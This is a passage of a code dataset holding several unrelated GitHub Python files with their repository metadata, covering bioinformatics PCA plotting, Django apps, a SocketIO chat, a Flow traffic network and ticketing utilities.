col]\n\n ax.text(0.2, 0.8, \"{}={:.2f}\".format(self.corr_method,\n corr_matrix[row, col]),\n horizontalalignment='left',\n transform=ax.transAxes)\n ax.get_yaxis().set_tick_params(\n which='both',\n left=False,\n right=False,\n direction='out')\n\n ax.get_xaxis().set_tick_params(\n which='both',\n top=False,\n bottom=False,\n direction='out')\n ax.get_xaxis().set_tick_params(\n which='major',\n labelrotation=45)\n\n if col != num_samples - 1:\n ax.set_yticklabels([])\n else:\n ax.yaxis.tick_right()\n ax.get_yaxis().set_tick_params(\n which='both',\n left=False,\n right=True,\n direction='out')\n if col - row == 1:\n ax.xaxis.tick_bottom()\n ax.get_xaxis().set_tick_params(\n which='both',\n top=False,\n bottom=True,\n direction='out')\n ax.get_xaxis().set_tick_params(\n which='major',\n labelrotation=45)\n\n else:\n ax.set_xticklabels([])\n\n ax.set_xlim(min_xvalue, max_xvalue)\n ax.set_ylim(min_yvalue, max_yvalue)\n ax.hist2d(vector2, vector1, bins=200, cmin=0.1)\n\n plt.savefig(plot_filename, format=image_format)\n plt.close()\n\n def plotly_pca(self, plotFile, Wt, pvar, PCs, eigenvalues, cols, plotTitle):\n \"\"\"\n A plotly version of plot_pca, that's called by it to do the actual plotting\n \"\"\"\n fig = go.Figure()\n fig['layout']['xaxis1'] = {'domain': [0.0, 0.48], 'anchor': 'x1', 'title': 'PC{} ({:4.1f}% of var. explained)'.format(PCs[0], 100.0 * pvar[PCs[0] - 1])}\n fig['layout']['yaxis1'] = {'domain': [0.0, 1.0], 'anchor': 'x1', 'title': 'PC{} ({:4.1f}% of var. explained)'.format(PCs[1], 100.0 * pvar[PCs[1] - 1])}\n fig['layout']['xaxis2'] = {'domain': [0.52, 1.0], 'title': 'Principal Component'}\n fig['layout']['yaxis2'] = {'domain': [0.0, 1.0], 'anchor': 'x2', 'title': 'Eigenvalue', 'rangemode': 'tozero', 'showgrid': False}\n fig['layout']['yaxis3'] = {'domain': [0.0, 1.0], 'anchor': 'x2', 'title': 'Cumulative variability', 'rangemode': 'tozero', 'side': 'right', 'overlaying': 'y2'}\n fig['layout'].update(title=plotTitle)\n\n # PCA\n if cols is not None:\n colors = itertools.cycle(cols)\n n = len(self.labels)\n data = []\n for i in range(n):\n trace = go.Scatter(x=[Wt[PCs[0] - 1, i]],\n y=[Wt[PCs[1] - 1, i]],\n mode='marker',\n xaxis='x1',\n yaxis='y1',\n name=self.labels[i])\n trace['marker'].update(size=20)\n if cols is not None:\n trace['marker'].update(color=next(colors))\n data.append(trace)\n\n # Scree plot\n trace = go.Bar(showlegend=False,\n name='Eigenvalues',\n x=range(1, n + 1),\n y=eigenvalues[:n],\n xaxis='x2',\n yaxis='y2')\n data.append(trace)\n\n # Cumulative variability\n trace = go.Scatter(showlegend=False,\n x=range(1, n + 1),\n y=pvar.cumsum()[:n],\n mode='lines+markers',\n name='Cumulative variability',\n xaxis='x2',\n yaxis='y3',\n line={'color': 'red'},\n marker={'symbol': 'circle-open-dot', 'color': 'black'})\n data.append(trace)\n\n annos = []\n annos.append({'yanchor': 'bottom', 'xref': 'paper', 'xanchor': 'center', 'yref': 'paper', 'text': 'PCA', 'y': 1.0, 'x': 0.25, 'font': {'size': 16}, 'showarrow': False})\n annos.append({'yanchor': 'bottom', 'xref': 'paper', 'xanchor': 'center', 'yref': 'paper', 'text': 'Scree plot', 'y': 1.0, 'x': 0.75, 'font': {'size': 16}, 'showarrow': False})\n\n fig.add_traces(data)\n fig['layout']['annotations'] = annos\n offline.plot(fig, filename=plotFile, auto_open=False)\n\n def plot_pca(self, plot_filename=None, PCs=[1, 2], plot_title='', image_format=None, log1p=False, plotWidth=5, plotHeight=10, cols=None, marks=None):\n \"\"\"\n Plot the PCA of a matrix\n\n Returns the matrix of plotted values.\n \"\"\"\n fig, (ax1, 
ax2) = plt.subplots(2, 1, figsize=(plotWidth, plotHeight))\n\n # Filter\n m = self.matrix\n rvs = m.var(axis=1)\n if self.transpose:\n m = m[np.nonzero(rvs)[0], :]\n rvs = rvs[np.nonzero(rvs)[0]]\n if self.ntop > 0 and m.shape[0] > self.ntop:\n m = m[np.argpartition(rvs, -self.ntop)[-self.ntop:], :]\n rvs = rvs[np.argpartition(rvs, -self.ntop)[-self.ntop:]]\n\n # log2 (if requested)\n if self.log2:\n self.matrix = np.log2(self.matrix + 0.01)\n\n # Row center / transpose\n if self.rowCenter and not self.transpose:\n _ = self.matrix.mean(axis=1)\n self.matrix -= _[:, None]\n if self.transpose:\n m = m.T\n\n # Center and scale\n m2 = (m - np.mean(m, axis=0))\n m2 /= np.std(m2, axis=0, ddof=1) # Use the unbiased std. dev.\n\n # SVD\n U, s, Vh = np.linalg.svd(m2, full_matrices=False, compute_uv=True) # Is full_matrices ever needed?\n\n # % variance, eigenvalues\n eigenvalues = s**2\n variance = eigenvalues / float(np.max([1, m2.shape[1] - 1]))\n pvar = variance / variance.sum()\n\n # Weights/projections\n Wt = Vh\n if self.transpose:\n # Use the projected coordinates for the transposed matrix\n Wt = np.dot(m2, Vh.T).T\n\n if plot_filename is not None:\n n = n_bars = len(self.labels)\n if eigenvalues.size < n:\n n_bars = eigenvalues.size\n markers = itertools.cycle(matplotlib.markers.MarkerStyle.filled_markers)\n if cols is not None:\n colors = itertools.cycle(cols)\n else:\n colors = itertools.cycle(plt.cm.gist_rainbow(np.linspace(0, 1, n)))\n\n if marks is not None:\n markers = itertools.cycle(marks)\n\n if image_format == 'plotly':\n self.plotly_pca(plot_filename, Wt, pvar, PCs, eigenvalues, cols, plot_title)\n else:\n ax1.axhline(y=0, color=\"black\", linestyle=\"dotted\", zorder=1)\n ax1.axvline(x=0, color=\"black\", linestyle=\"dotted\", zorder=2)\n for i in range(n):\n color = next(colors)\n marker = next(markers)\n if isinstance(color, np.ndarray):\n color = pltcolors.to_hex(color, keep_alpha=True)\n ax1.scatter(Wt[PCs[0] - 1, i], Wt[PCs[1] - 1, i],\n marker=marker, color=color, s=150, label=self.labels[i], zorder=i + 3)\n if plot_title == '':\n ax1.set_title('PCA')\n else:\n ax1.set_title(plot_title)\n ax1.set_xlabel('PC{} ({:4.1f}% of var. explained)'.format(PCs[0], 100.0 * pvar[PCs[0] - 1]))\n ax1.set_ylabel('PC{} ({:4.1f}% of var. 
explained)'.format(PCs[1], 100.0 * pvar[PCs[1] - 1]))\n lgd = ax1.legend(scatterpoints=1, loc='center left', borderaxespad=0.5,\n bbox_to_anchor=(1, 0.5),\n prop={'size': 12}, markerscale=0.9)\n\n # Scree plot\n ind = np.arange(n_bars) # the x locations for the groups\n width = 0.35 # the width of the bars\n\n if mpl.__version__ >= \"2.0.0\":\n ax2.bar(2 * width + ind, eigenvalues[:n_bars], width * 2)\n else:\n ax2.bar(width + ind, eigenvalues[:n_bars], width * 2)\n ax2.set_ylabel('Eigenvalue')\n ax2.set_xlabel('Principal Component')\n ax2.set_title('Scree plot')\n ax2.set_xticks(ind + width * 2)\n ax2.set_xticklabels(ind + 1)\n\n ax3 = ax2.twinx()\n ax3.axhline(y=1, color=\"black\", linestyle=\"dotted\")\n ax3.plot(width * 2 + ind, pvar.cumsum()[:n], \"r-\")\n ax3.plot(width * 2 + ind, pvar.cumsum()[:n], \"wo\", markeredgecolor=\"black\")\n ax3.set_ylim([0, 1.05])\n ax3.set_ylabel('Cumulative variability')\n\n plt.subplots_adjust(top=3.85)\n plt.tight_layout()\n plt.savefig(plot_filename, format=image_format, bbox_extra_artists=(lgd,), bbox_inches='tight')\n plt.close()\n\n return Wt, eigenvalues\n","repo_name":"deeptools/deepTools","sub_path":"deeptools/correlation.py","file_name":"correlation.py","file_ext":"py","file_size_in_byte":28078,"program_lang":"python","lang":"en","doc_type":"code","stars":615,"dataset":"github-code","pt":"69"}
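A minimal, self-contained sketch of the per-column MAD outlier filter implemented in the record above, assuming a plain 2-D NumPy array. The function names are illustrative, not the deepTools API; note that the median absolute deviation subtracts the median before taking absolute values.

```python
import numpy as np

def mad_outlier_indices(data, max_deviation=200):
    # Median absolute deviation, scaled by 1.4826 so it estimates the
    # standard deviation under a normal distribution.
    median = np.median(data)
    mad = 1.4826 * np.median(np.abs(data - median))
    if mad == 0:
        return np.array([], dtype=int)
    deviation = np.abs(data - median) / mad
    return np.flatnonzero(deviation > max_deviation)

def filter_rows(matrix, max_deviation=200):
    # Remove a row only if it is an outlier in *every* column,
    # i.e. intersect the per-column outlier sets before dropping.
    to_remove = None
    for col in matrix.T:
        outliers = set(mad_outlier_indices(col, max_deviation))
        to_remove = outliers if to_remove is None else to_remove & outliers
    keep = [i for i in range(matrix.shape[0]) if i not in (to_remove or set())]
    return matrix[keep, :]

if __name__ == "__main__":
    m = np.vstack([np.random.default_rng(0).normal(size=(100, 2)),
                   [[1e6, 1e6]]])                   # one extreme row
    print(filter_rows(m, max_deviation=10).shape)   # -> (100, 2)
```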
+{"seq_id":"72732698139","text":"import os\nimport glob\nimport textacy\nfrom .article_parser import ArticleParser\nfrom preprocess_text.document import Document\n\nclass WebhoseArticleParser(ArticleParser):\n def __init__(self, articles_directory):\n ArticleParser.__init__(self, articles_directory)\n self.json_article_files = glob.iglob(os.path.join(os.path.abspath(self.articles_dir), \"news*.json\"))\n\n def num_articles(self):\n return len(glob.glob1(os.path.join(os.path.abspath(self.articles_dir)), \"news*.json\"))\n\n def yield_articles(self):\n for article_filename in self.json_article_files:\n article_json = textacy.fileio.read.read_json(article_filename)\n content, metadata = textacy.fileio.utils.split_record_fields(article_json, \"text\")\n content_full = \"\"\n for line in content:\n content_full += line.encode('ascii', errors='replace').decode('ascii')\n metadata_full = {}\n for data in metadata:\n metadata_full = {**metadata_full, **data}\n yield Document(content_full, metadata=metadata_full, lang=\"en\")\n","repo_name":"ASethi77/StateOfTheMedia","sub_path":"src/preprocess_text/article_parsers/webhose_article_parser.py","file_name":"webhose_article_parser.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71751949979","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\ndef description_to_classification(apps, schema_editor):\n Broadcast = apps.get_model('schedule', 'Broadcast')\n for broadcast in Broadcast.objects.all():\n broadcast.classification = broadcast.description\n broadcast.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('schedule', '0002_remove_broadcast_ending'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='broadcast',\n name='classification',\n field=models.CharField(max_length=512, verbose_name='Classification', blank=True),\n ),\n migrations.RunPython(description_to_classification, migrations.RunPython.noop),\n migrations.RemoveField(\n model_name='broadcast',\n name='description',\n ),\n ]\n","repo_name":"GISAElkartea/amv2","sub_path":"antxetamedia/schedule/migrations/0003_auto_20150918_1019.py","file_name":"0003_auto_20150918_1019.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"30309934560","text":"from django.contrib import admin\nfrom django.urls import path, include, reverse_lazy\nfrom django.views.generic import RedirectView\n\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\n\n# swagger documentation\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Papelaria Hipo\",\n default_version='v1',\n description=\"Product sales management\",\n terms_of_service=\"#\",\n contact=openapi.Contact(email=\"bruno.tech@amcom.com\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n path('', RedirectView.as_view(url=reverse_lazy('schema-swagger-ui'), permanent=False), name='index'),\n path('admin/', admin.site.urls),\n path('api/v1/', include('apps.product.urls', namespace='products')),\n path('api/v1/', include('apps.seller.urls', namespace='sellers')),\n path('api/v1/', include('apps.customer.urls', namespace='customers')),\n path('api/v1/', include('apps.sale.urls', namespace='sales')),\n path('api/v1/swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n]\n","repo_name":"brunosp1024/papelaria-hipo","sub_path":"backend/setup/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6404832537","text":"from .. import socketio\nfrom src.services.message_handler import MessageHandler\nfrom flask_socketio import join_room, leave_room\nfrom flask import session\n\n\nmessage_handler = MessageHandler()\n\n@socketio.on('read messages')\ndef read_messages(methods=['GET', 'POST']):\n content = message_handler.build_messages()\n socketio.emit('response event', content)\n\n@socketio.on('user connection')\ndef user_connected(json, methods=['GET', 'POST']):\n join_room('chat')\n # Avoid replacing the last user info by the current one.\n try:\n current_user = session[json['id']]\n except:\n session[json['id']] = json['user']\n\n@socketio.on('user disconnected')\ndef user_disconnected( methods=['GET', 'POST']):\n leave_room('chat')\n\n@socketio.on('message event')\ndef handle_messages(json, methods=['GET', 'POST']):\n json['user_name'] = session[json['id']]\n message_handler.process_payload(json)","repo_name":"IsacLira/stock-price-chatbot","sub_path":"src/main/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13129345771","text":"\"\"\"Contains the figure eight network class.\"\"\"\n\nimport numpy as np\nfrom numpy import pi, sin, cos, linspace\n\nfrom flow.core.params import InitialConfig\nfrom flow.core.params import TrafficLightParams\nfrom flow.networks.base import Network\n\nADDITIONAL_NET_PARAMS = {\n # radius of the circular components\n \"radius_ring\": 30,\n # number of lanes\n \"lanes\": 1,\n # speed limit for all edges\n \"speed_limit\": 30,\n # resolution of the curved portions\n \"resolution\": 40\n}\n\n\nclass FigureEightNetwork(Network):\n \"\"\"Figure eight network class.\n\n The figure eight network is an extension of the ring road network: Two\n rings, placed at opposite ends of the network, are connected by an\n intersection with road segments of length equal to the diameter of the\n rings. Serves as a simulation of a closed ring intersection.\n\n Requires from net_params:\n\n * **ring_radius** : radius of the circular portions of the network. Also\n corresponds to half the length of the perpendicular straight lanes.\n * **resolution** : number of nodes resolution in the circular portions\n * **lanes** : number of lanes in the network\n * **speed** : max speed of vehicles in the network\n\n Usage\n -----\n >>> from flow.core.params import NetParams\n >>> from flow.core.params import VehicleParams\n >>> from flow.core.params import InitialConfig\n >>> from flow.networks import FigureEightNetwork\n >>>\n >>> network = FigureEightNetwork(\n >>> name='figure_eight',\n >>> vehicles=VehicleParams(),\n >>> net_params=NetParams(\n >>> additional_params={\n >>> 'radius_ring': 50,\n >>> 'lanes': 75,\n >>> 'speed_limit': 30,\n >>> 'resolution': 40\n >>> },\n >>> )\n >>> )\n \"\"\"\n\n def __init__(self,\n name,\n vehicles,\n net_params,\n initial_config=InitialConfig(),\n traffic_lights=TrafficLightParams()):\n \"\"\"Initialize a figure 8 network.\"\"\"\n for p in ADDITIONAL_NET_PARAMS.keys():\n if p not in net_params.additional_params:\n raise KeyError('Network parameter \"{}\" not supplied'.format(p))\n\n ring_radius = net_params.additional_params[\"radius_ring\"]\n self.ring_edgelen = ring_radius * np.pi / 2.\n self.intersection_len = 2 * ring_radius\n self.junction_len = 2.9 + 3.3 * net_params.additional_params[\"lanes\"]\n self.inner_space_len = 0.28\n\n # # instantiate \"length\" in net params\n # net_params.additional_params[\"length\"] = \\\n # 6 * self.ring_edgelen + 2 * self.intersection_len + \\\n # 2 * self.junction_len + 10 * self.inner_space_len\n\n super().__init__(name, vehicles, net_params, initial_config,\n traffic_lights)\n\n def specify_nodes(self, net_params):\n \"\"\"See parent class.\"\"\"\n r = net_params.additional_params[\"radius_ring\"]\n\n nodes = [{\n \"id\": \"center\",\n \"x\": 0,\n \"y\": 0,\n \"radius\": (2.9 + 3.3 * net_params.additional_params[\"lanes\"])/2,\n \"type\": \"priority\"\n }, {\n \"id\": \"right\",\n \"x\": r,\n \"y\": 0,\n \"type\": \"priority\"\n }, {\n \"id\": \"top\",\n \"x\": 0,\n \"y\": r,\n \"type\": \"priority\"\n }, {\n \"id\": \"left\",\n \"x\": -r,\n \"y\": 0,\n \"type\": \"priority\"\n }, {\n \"id\": \"bottom\",\n \"x\": 0,\n \"y\": -r,\n \"type\": \"priority\"\n }]\n\n return nodes\n\n def specify_edges(self, net_params):\n \"\"\"See parent class.\"\"\"\n r = net_params.additional_params[\"radius_ring\"]\n resolution = net_params.additional_params[\"resolution\"]\n ring_edgelen = 3 * r * pi / 2.\n intersection_edgelen = 2 * r\n\n # intersection edges\n edges = [{\n \"id\": \"bottom\",\n \"type\": \"edgeType\",\n 
\"priority\": \"78\",\n \"from\": \"bottom\",\n \"to\": \"center\",\n \"length\": intersection_edgelen / 2\n }, {\n \"id\": \"top\",\n \"type\": \"edgeType\",\n \"priority\": 78,\n \"from\": \"center\",\n \"to\": \"top\",\n \"length\": intersection_edgelen / 2\n }, {\n \"id\": \"right\",\n \"type\": \"edgeType\",\n \"priority\": 46,\n \"from\": \"right\",\n \"to\": \"center\",\n \"length\": intersection_edgelen / 2\n }, {\n \"id\": \"left\",\n \"type\": \"edgeType\",\n \"priority\": 46,\n \"from\": \"center\",\n \"to\": \"left\",\n \"length\": intersection_edgelen / 2\n }]\n\n # ring edges\n edges += [{\n \"id\": \"upper_ring\",\n \"type\": \"edgeType\",\n \"from\": \"top\",\n \"to\": \"right\",\n \"length\": ring_edgelen,\n \"shape\": [(r * (1 - cos(t)), r * (1 + sin(t)))\n for t in linspace(0, 3 * pi / 2, resolution)]\n }, {\n \"id\": \"lower_ring\",\n \"type\": \"edgeType\",\n \"from\": \"left\",\n \"to\": \"bottom\",\n \"length\": ring_edgelen,\n \"shape\": [(-r + r * cos(t), -r + r * sin(t))\n for t in linspace(pi / 2, 2 * pi, resolution)]\n }]\n\n return edges\n\n def specify_types(self, net_params):\n \"\"\"See parent class.\"\"\"\n lanes = net_params.additional_params[\"lanes\"]\n speed_limit = net_params.additional_params[\"speed_limit\"]\n types = [{\n \"id\": \"edgeType\",\n \"numLanes\": lanes,\n \"speed\": speed_limit\n }]\n\n return types\n\n def specify_routes(self, net_params):\n \"\"\"See parent class.\"\"\"\n rts = {\n \"bottom\":\n [\"bottom\", \"top\", \"upper_ring\", \"right\", \"left\", \"lower_ring\"],\n \"top\":\n [\"top\", \"upper_ring\", \"right\", \"left\", \"lower_ring\", \"bottom\"],\n \"upper_ring\":\n [\"upper_ring\", \"right\", \"left\", \"lower_ring\", \"bottom\", \"top\"],\n \"left\":\n [\"left\", \"lower_ring\", \"bottom\", \"top\", \"upper_ring\", \"right\"],\n \"right\":\n [\"right\", \"left\", \"lower_ring\", \"bottom\", \"top\", \"upper_ring\"],\n \"lower_ring\":\n [\"lower_ring\", \"bottom\", \"top\", \"upper_ring\", \"right\", \"left\"],\n }\n\n return rts\n\n def specify_connections(self, net_params):\n \"\"\"See parent class.\"\"\"\n lanes = net_params.additional_params[\"lanes\"]\n conn_dict = {}\n conn = []\n for i in range(lanes):\n conn += [{\"from\": \"bottom\",\n \"to\": \"top\",\n \"fromLane\": str(i),\n \"toLane\": str(i)}]\n conn += [{\"from\": \"right\",\n \"to\": \"left\",\n \"fromLane\": str(i),\n \"toLane\": str(i)}]\n conn_dict[\"center\"] = conn\n return conn_dict\n\n def specify_edge_starts(self):\n \"\"\"See base class.\"\"\"\n edgestarts = [\n (\"bottom\", self.inner_space_len),\n (\"top\", self.intersection_len / 2 + self.junction_len +\n self.inner_space_len),\n (\"upper_ring\", self.intersection_len + self.junction_len +\n 2 * self.inner_space_len),\n (\"right\", self.intersection_len + 3 * self.ring_edgelen\n + self.junction_len + 3 * self.inner_space_len),\n (\"left\", 3 / 2 * self.intersection_len + 3 * self.ring_edgelen\n + 2 * self.junction_len + 3 * self.inner_space_len),\n (\"lower_ring\", 2 * self.intersection_len + 3 * self.ring_edgelen\n + 2 * self.junction_len + 4 * self.inner_space_len)]\n\n return edgestarts\n\n def specify_internal_edge_starts(self):\n \"\"\"See base class.\"\"\"\n internal_edgestarts = [\n (\":bottom\", 0),\n (\":center_{}\".format(self.net_params.additional_params['lanes']),\n self.intersection_len / 2 + self.inner_space_len),\n (\":top\", self.intersection_len + self.junction_len +\n self.inner_space_len),\n (\":right\", self.intersection_len + 3 * self.ring_edgelen\n + self.junction_len + 2 * 
self.inner_space_len),\n (\":center_0\", 3 / 2 * self.intersection_len + 3 * self.ring_edgelen\n + self.junction_len + 3 * self.inner_space_len),\n (\":left\", 2 * self.intersection_len + 3 * self.ring_edgelen\n + 2 * self.junction_len + 3 * self.inner_space_len),\n # for aimsun\n ('bottom_to_top',\n self.intersection_len / 2 + self.inner_space_len),\n ('right_to_left',\n + self.junction_len + 3 * self.inner_space_len),\n ]\n\n return internal_edgestarts\n","repo_name":"flow-project/flow","sub_path":"flow/networks/figure_eight.py","file_name":"figure_eight.py","file_ext":"py","file_size_in_byte":8953,"program_lang":"python","lang":"en","doc_type":"code","stars":978,"dataset":"github-code","pt":"69"}
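The `shape` entries above trace the two ring arcs parametrically; a small check that the "upper_ring" arc really starts at the "top" node (0, r) and ends at the "right" node (r, 0), using the default radius and resolution from ADDITIONAL_NET_PARAMS.

```python
import numpy as np

r, resolution = 30, 40
t = np.linspace(0, 3 * np.pi / 2, resolution)
# Same expression as the "upper_ring" edge shape above.
arc = [(r * (1 - np.cos(tt)), r * (1 + np.sin(tt))) for tt in t]

print(arc[0])    # (0.0, 30.0)      -> the "top" node at (0, r)
print(arc[-1])   # ~(30.0, 0.0)     -> the "right" node at (r, 0)
```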
+{"seq_id":"36040783188","text":"import boto3\n\n\nclass ProductService:\n\n def __int__(self):\n self.dynamo = boto3.client('dynamodb')\n\n def create_product(self, product: dict):\n self.dynamo.put_item(TableName='Product', Item=product)\n return {\n 'statusCode': 200,\n 'body': 'Successfully Created Product'\n }","repo_name":"dizipharm/tpapi","sub_path":"src/service/dynamo/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16464453451","text":"import requests\r\nimport itertools as it\r\nfrom Saman_arena import*\r\nfrom Eventos import Evento, Musical, Teatral\r\nfrom Productos import Productos, Comidas, Bedidas\r\nimport pickle\r\nimport os\r\n\r\n\r\ndef recibir_datos_del_txt(nombre_txt,datos): #Funcion para recibir los datos del archivo TXT\r\n \r\n lectura_binaria= open(nombre_txt,'rb')\r\n \r\n if os.stat(nombre_txt).st_size != 0:\r\n datos=pickle.load(lectura_binaria)\r\n\r\n lectura_binaria.close()\r\n\r\n return datos\r\n\r\n\r\n\r\ndef cargar_datos_en_txt(nombre_txt,datos): #Función para GUARDAR los datos en el archivo TXT\r\n\r\n escritura_binaria=open(nombre_txt,'wb')\r\n\r\n datos=pickle.dump(datos,escritura_binaria)\r\n \r\n escritura_binaria.close()\r\n\r\n\r\ndef make_request(url): #Función para llamar al API\r\n response = requests.get(url)\r\n return response\r\n\r\ndef validar_numero(msg): #Validar inputs numeros\r\n while True:\r\n num = input(msg)\r\n if num.isnumeric():\r\n num = int(num)\r\n break\r\n else:\r\n print('Error, valor ingresado no valido')\r\n print('')\r\n return num\r\n\r\ndef validar_palabra(msg): #Validar inputs palabras\r\n while True:\r\n word=input(msg)\r\n if word.replace(\" \",\"\").isalpha():\r\n break\r\n else:\r\n print(\"Error, valor ingresado no valido\")\r\n \r\n return word\r\n\r\ndef crear_bd(bd, bd_api, restablecer_bd): #Funcion que crea la base de datos local\r\n id_evento = 0\r\n for key, value in bd_api.items():\r\n if key == \"events\":\r\n for evento in value:\r\n id_evento += 1\r\n title = evento[\"title\"]\r\n tipo = evento[\"type\"]\r\n cartel = evento[\"cartel\"]\r\n fila_general = evento[\"layout\"][\"general\"][0]\r\n columna_general = evento[\"layout\"][\"general\"][1]\r\n tickets_general = fila_general * columna_general\r\n fila_vip = evento[\"layout\"][\"vip\"][0]\r\n columna_vip = evento[\"layout\"][\"vip\"][1]\r\n tickets_vip = fila_vip * columna_vip\r\n asientos_general = crear_matriz(fila_general, columna_general) #Se crea la matriz de los asientos generales\r\n asientos_vip = crear_matriz(fila_vip, columna_vip) #Se crea la matriz de los asientos vip \r\n price_general = evento[\"prices\"][0]\r\n price_vip = evento[\"prices\"][1]\r\n asiento = asientos(fila_general, columna_general, fila_vip, columna_vip, asientos_general, asientos_vip, tickets_general, tickets_vip, price_general, price_vip) #Se crea el objeto asiento para el evento\r\n date = evento[\"date\"]\r\n ingresos = 0\r\n apertura = True\r\n if evento['type'] == 1:\r\n bands = evento[\"bands\"]\r\n musical = Musical(title, tipo, cartel, asiento, date, ingresos, apertura, bands) #Se crea el objeto evento de tipo Musical\r\n bd[\"events\"][id_evento] = musical\r\n else:\r\n synopsis = evento[\"synopsis\"]\r\n teatral = Teatral(title, tipo, cartel, asiento, date, ingresos, apertura, synopsis) #Se crea el objeto evento de tipo Teatral\r\n bd[\"events\"][id_evento] = teatral\r\n elif key == \"food_fair_inventory\":\r\n iva = 0.16\r\n bd[\"products\"][\"Comidas\"] = [] #Reseteo de la lista de productos para cuando se deseee reestablcer la base de datos en su totalidad\r\n bd[\"products\"][\"Bebidas\"] = []\r\n for producto in value:\r\n if producto[\"type\"] == 1:\r\n name = producto[\"name\"]\r\n price = producto[\"price\"]\r\n aumento = price * iva\r\n final_price = price + aumento\r\n final_price = round(final_price, 2)\r\n amount = producto[\"amount\"]\r\n presentation = producto[\"presentation\"]\r\n amount_sell = 0\r\n comida = Comidas(name, amount, presentation, 
final_price, amount_sell)\r\n bd[\"products\"][\"Comidas\"].append(comida)\r\n restablecer_bd[\"products\"][\"Comidas\"].append(comida)\r\n else:\r\n name = producto[\"name\"]\r\n prices = producto[\"price\"]\r\n final_price = []\r\n for price in prices:\r\n aumento = price * iva\r\n new_price = price + aumento\r\n new_price = round(new_price, 2)\r\n final_price.append(new_price)\r\n little_price = final_price[0]\r\n middle_price = final_price[1]\r\n big_price = final_price[2]\r\n amount = producto[\"amount\"]\r\n divider_amount = amount // 3\r\n little_amount = divider_amount\r\n middle_amount = divider_amount\r\n big_amount = divider_amount\r\n amount_sell = 0\r\n bebida = Bedidas(name, amount, little_amount, middle_amount, big_amount, little_price, middle_price, big_price, amount_sell)\r\n bd[\"products\"][\"Bebidas\"].append(bebida)\r\n restablecer_bd[\"products\"][\"Bebidas\"].append(bebida)\r\n bd[\"clients\"] = {} #Reseteo del diccionario clientes para cuando se desee reestablecer la base de datos en su totalidad\r\n return bd, restablecer_bd\r\n\r\n\r\n\r\ndef es_narcisista(numero): #Codigo tomado de: https://parzibyte.me/blog/2018/10/02/numero-narcisista-python/\r\n numero_como_cadena = str(numero)\r\n longitud_de_numero = len(numero_como_cadena)\r\n suma = 0\r\n for letra in numero_como_cadena:\r\n # Convertir carácter a entero\r\n cifra_actual = int(letra)\r\n\r\n # Elevar ese carácter a la potencia dada por la longitud del número\r\n elevado = pow(cifra_actual, longitud_de_numero)\r\n\r\n # El resultado lo añadimos a suma\r\n suma = suma + elevado\r\n # Comprobar si la suma al elevar es igual al número que recibimos\r\n if numero == suma:\r\n return True\r\n else:\r\n return False\r\n\r\ndef get_vampire(num): #Codido tomado de: https://www.geeksforgeeks.org/vampire-number/\r\n\r\n def getFangs(num_str):\r\n \r\n num_iter = it.permutations(num_str, len(num_str))\r\n \r\n for num_list in num_iter:\r\n \r\n v = ''.join(num_list)\r\n x, y = v[:int(len(v)/2)], v[int(len(v)/2):]\r\n \r\n if x[-1] == '0' and y[-1] == '0':\r\n continue\r\n \r\n \r\n if int(x) * int(y) == int(num_str):\r\n return x,y\r\n return False\r\n \r\n \r\n n_str = str(num)\r\n \r\n \r\n if len(n_str) % 2 == 1:\r\n return False\r\n \r\n\r\n fangs = getFangs(n_str)\r\n if not fangs:\r\n return False\r\n return True\r\n","repo_name":"GAUGUSTO1602/Proyecto_python","sub_path":"Proyecto/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
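The first two helpers in the record above implement a pickle load/save round-trip guarded by an empty-file check; an English-language sketch of the same pattern (the file name and payload are illustrative).

```python
import os
import pickle

def load_data(path, default):
    # Return `default` when the file is missing or empty, mirroring
    # the os.stat(...).st_size check in the record above.
    if not os.path.exists(path) or os.stat(path).st_size == 0:
        return default
    with open(path, "rb") as fh:
        return pickle.load(fh)

def save_data(path, data):
    with open(path, "wb") as fh:
        pickle.dump(data, fh)

save_data("db.bin", {"events": {}, "clients": {}})
print(load_data("db.bin", default={}))  # -> {'events': {}, 'clients': {}}
```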
+{"seq_id":"38365766383","text":"from django.urls import include, path\n\nfrom .views import (\n SearchVideo,\n AllVideos,\n GetVideo,\n CreateVideo,\n DeleteVideo,\n UpdateVideo,\n LikeVideo,\n CreateComment,\n VideoComments,\n SubscribeVideoChannel,\n SubscribeChannelCheck,\n SubscribedVideos,\n UserVideos,\n RelatedVideos,\n DiscoverVideos,\n MostWatchedVideos,\n Trending,\n MostPopular,\n ForYou,\n WebPushTokens,\n)\n\n\napp_name = \"main\"\n\nfrom rest_framework.routers import DefaultRouter, SimpleRouter\n\nrouter = SimpleRouter()\nrouter.register(r\"tokens\", WebPushTokens)\n\n\nurlpatterns = [\n path(\"search/video//\", SearchVideo.as_view(), name=\"search_video\"),\n path(\"all_videos/\", AllVideos.as_view(), name=\"all_videos\"),\n path(\"get_video//\", GetVideo.as_view(), name=\"get_video\"),\n path(\"create_video/\", CreateVideo.as_view(), name=\"create_video\"),\n path(\"delete_video//\", DeleteVideo.as_view(), name=\"delete_video\"),\n path(\"update_video//\", UpdateVideo.as_view(), name=\"update_video\"),\n path(\"related_videos//\", RelatedVideos.as_view(), 